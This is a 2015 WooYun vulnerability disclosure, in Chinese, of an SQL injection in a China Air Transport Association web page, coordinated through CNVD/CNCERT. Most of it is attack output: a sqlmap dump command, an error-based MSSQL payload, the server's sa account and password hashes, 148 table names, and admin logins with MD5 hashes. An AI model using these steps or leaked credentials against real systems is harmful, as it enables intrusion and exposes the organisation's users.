当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0149044

漏洞标题:中国航空运输协会某处存在SQL注射漏洞(DBA权限/sa密码泄露/148个表/管理密码泄露)

相关厂商:中国航空运输协会

漏洞作者: 路人甲

提交时间:2015-10-24 09:06

修复时间:2015-12-12 14:46

公开时间:2015-12-12 14:46

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-10-24: 细节已通知厂商并且等待厂商处理中
2015-10-28: 厂商已经确认,细节仅向厂商公开
2015-11-07: 细节向核心白帽子及相关领域专家公开
2015-11-17: 细节向普通白帽子公开
2015-11-27: 细节向实习白帽子公开
2015-12-12: 细节向公众公开

简要描述:

中国航空运输协会某处存在SQL注射漏洞(DBA权限/sa密码泄露/148个表/管理密码泄露)

详细说明:

测试地址:http://**.**.**.**/wenknr/index.aspx?nodeid=331&page=ContentPage&contentid=12315&type=xw

python sqlmap.py -u "http://**.**.**.**/wenknr/index.aspx?nodeid=331&page=ContentPage&contentid=12315&type=xw" --random-agent -p contentid --technique=E -D webplug_thxh -T AdminUser -C AdminUserID,LoginName,Password,Email --dump

漏洞证明:

---
Parameter: contentid (GET)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: nodeid=331&page=ContentPage&contentid=12315 AND 3617=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(122)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (3617=3617) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(122)+CHAR(107)+CHAR(113)))&type=xw
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
current user:    'sa'
current user is DBA:    True
database management system users [3]:
[*] ##MS_PolicyEventProcessingLogin##
[*] ##MS_PolicyTsqlExecutionLogin##
[*] sa
database management system users password hashes:
[*] ##MS_PolicyEventProcessingLogin## [1]:
    password hash: 0x0100b3d80630dbee3a8a58a74641cd043eeda38aaa96b010f27b
        header: 0x0100
        salt: b3d80630
        mixedcase: dbee3a8a58a74641cd043eeda38aaa96b010f27b
[*] ##MS_PolicyTsqlExecutionLogin## [1]:
    password hash: 0x01007de408d88ab4c5e16cfd45bf2b5baab81df972382092ad9f
        header: 0x0100
        salt: 7de408d8
        mixedcase: 8ab4c5e16cfd45bf2b5baab81df972382092ad9f
[*] sa [1]:
    password hash: 0x0100f65f10d1ed15a6fb82a41330e9446e9bb1da47eb42852edd
        header: 0x0100
        salt: f65f10d1
        mixedcase: ed15a6fb82a41330e9446e9bb1da47eb42852edd
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: contentid (GET)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: nodeid=331&page=ContentPage&contentid=12315 AND 3617=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(122)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (3617=3617) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(122)+CHAR(107)+CHAR(113)))&type=xw
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: contentid (GET)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: nodeid=331&page=ContentPage&contentid=12315 AND 3617=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(122)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (3617=3617) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(122)+CHAR(107)+CHAR(113)))&type=xw
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
available databases [6]:
[*] master
[*] model
[*] msdb
[*] tempdb
[*] webplug_thxh
[*] webplug_tyhk
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: contentid (GET)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: nodeid=331&page=ContentPage&contentid=12315 AND 3617=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(122)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (3617=3617) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(122)+CHAR(107)+CHAR(113)))&type=xw
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
Database: webplug_thxh
[148 tables]
+-------------------------------+
| AdminRole                     |
| AdminRoleMenu                 |
| AdminRoleNode                 |
| AdminUser                     |
| AdminUserRole                 |
| Component                     |
| ComponentAccessory            |
| ComponentCategory             |
| Email                         |
| Invitation                    |
| Job_001_Department            |
| Node                          |
| NodeAccessory                 |
| NodeComponent                 |
| NodeGroup                     |
| NodeGroupRelation             |
| NodeThumbnailPhoto            |
| PositionCollection            |
| PressRelease                  |
| Product                       |
| Recruitment                   |
| Replies                       |
| RepliesTB                     |
| Site                          |
| SiteLanguage                  |
| SupplyDemandRelease           |
| SystemLogging                 |
| SystemMenu                    |
| TalentJob                     |
| Templet                       |
| ThumbnailPhoto                |
| ad_001_Advertisement          |
| ad_001_AdvertisementCouplet   |
| ad_001_AdvertisementFloat     |
| ad_001_AdvertisementPopWin    |
| ad_001_AdvertisementTemplates |
| catalog_001_Category          |
| catalog_001_Item              |
| catalog_001_PhotoDetail       |
| catalog_001_Review            |
| city                          |
| dnt_admingroups               |
| dnt_adminvisitlog             |
| dnt_advertisements            |
| dnt_announcements             |
| dnt_attachments               |
| dnt_attachpaymentlog          |
| dnt_attachtypes               |
| dnt_banned                    |
| dnt_bbcodes                   |
| dnt_bonuslog                  |
| dnt_creditslog                |
| dnt_debatediggs               |
| dnt_debates                   |
| dnt_failedlogins              |
| dnt_favorites                 |
| dnt_forumfields               |
| dnt_forumlinks                |
| dnt_forums                    |
| dnt_help                      |
| dnt_invitation                |
| dnt_locations                 |
| dnt_medals                    |
| dnt_medalslog                 |
| dnt_moderatormanagelog        |
| dnt_moderators                |
| dnt_myattachments             |
| dnt_myposts                   |
| dnt_mytopics                  |
| dnt_navs                      |
| dnt_notices                   |
| dnt_online                    |
| dnt_onlinelist                |
| dnt_onlinetime                |
| dnt_orders                    |
| dnt_paymentlog                |
| dnt_pms                       |
| dnt_polloptions               |
| dnt_polls                     |
| dnt_postdebatefields          |
| dnt_postid                    |
| dnt_posts1                    |
| dnt_ratelog                   |
| dnt_scheduledevents           |
| dnt_searchcaches              |
| dnt_smilies                   |
| dnt_statistics                |
| dnt_stats                     |
| dnt_statvars                  |
| dnt_tablelist                 |
| dnt_tags                      |
| dnt_templates                 |
| dnt_topicidentify             |
| dnt_topics                    |
| dnt_topictagcaches            |
| dnt_topictags                 |
| dnt_topictypes                |
| dnt_trendstat                 |
| dnt_userfields                |
| dnt_usergroups                |
| dnt_users                     |
| dnt_words                     |
| form_001_Config               |
| form_001_Form                 |
| imageviewer_001_Category      |
| imageviewer_001_Group         |
| imageviewer_001_Item          |
| job_001_Job                   |
| job_003_Department            |
| job_003_Job                   |
| job_003_uip_Certificate       |
| job_003_uip_EducationHistory  |
| job_003_uip_Province          |
| job_003_uip_ResumeState       |
| job_003_uip_TrainingHistory   |
| job_003_uip_User              |
| job_003_uip_WorkHistory       |
| job_003_uip_v_Resume          |
| job_004_Department            |
| job_004_Job                   |
| job_004_State                 |
| job_004_User                  |
| member_001_Member             |
| member_001_MemberDisplay      |
| member_001_MemberType         |
| message_001_Display           |
| message_001_Message           |
| message_001_Type              |
| publication_001_Article       |
| publication_001_Catalog       |
| publication_001_Periodical    |
| publication_001_Publication   |
| research_001_Answer           |
| research_001_Item             |
| research_001_Paper            |
| research_001_Question         |
| thxh_Apply                    |
| thxh_Baike                    |
| thxh_BaikeAnswer              |
| thxh_BaikeType                |
| thxh_Collection               |
| thxh_Comment                  |
| thxh_EnterpriseInfo           |
| thxh_HrInfo                   |
| thxh_Message                  |
| thxh_TradeLeads               |
| thxh_UserInfo                 |
| wp_Config                     |
+-------------------------------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: contentid (GET)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: nodeid=331&page=ContentPage&contentid=12315 AND 3617=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(122)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (3617=3617) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(122)+CHAR(107)+CHAR(113)))&type=xw
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
Database: webplug_thxh
Table: AdminUser
[6 columns]
+-------------+----------+
| Column      | Type     |
+-------------+----------+
| AddTime     | datetime |
| AdminUserID | int      |
| Email       | nvarchar |
| LoginName   | nvarchar |
| Password    | nvarchar |
| RealName    | nvarchar |
+-------------+----------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: contentid (GET)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: nodeid=331&page=ContentPage&contentid=12315 AND 3617=CONVERT(INT,(SELECT CHAR(113)+CHAR(112)+CHAR(122)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (3617=3617) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(122)+CHAR(107)+CHAR(113)))&type=xw
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
Database: webplug_thxh
Table: AdminUser
[6 entries]
+-------------+-----------+----------------------------------+------------------------+
| AdminUserID | LoginName | Password                         | Email                  |
+-------------+-----------+----------------------------------+------------------------+
| 5           | yangy     | 1184328ec3cae297298fc2efb934c413 | <blank>                |
| 6           | zkqing    | 317fe8866967ca216297b11f16810acd | <blank>                |
| 3           | train     | 4793a9bda9ce17f55ba9892102e5c079 | tongyonghk_scg@**.**.**.** |
| 7           | xhgz      | a999652c5f65fda6700383af516fed78 | <blank>                |
| 1           | admin     | f588d7eb08c290ebd300a3cdf0c5bad2 | <blank>                |
| 4           | hzxx      | fb975e36766dc259d2cd68851c02e216 | tongyonghk_lry@**.**.**.** |
+-------------+-----------+----------------------------------+------------------------+

修复方案:

增加过滤。

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2015-10-28 14:44

厂商回复:

CNVD确认所述情况,已经转由CNCERT向民航行业测评中心通报,由其后续协调网站管理单位处置。

最新状态:

暂无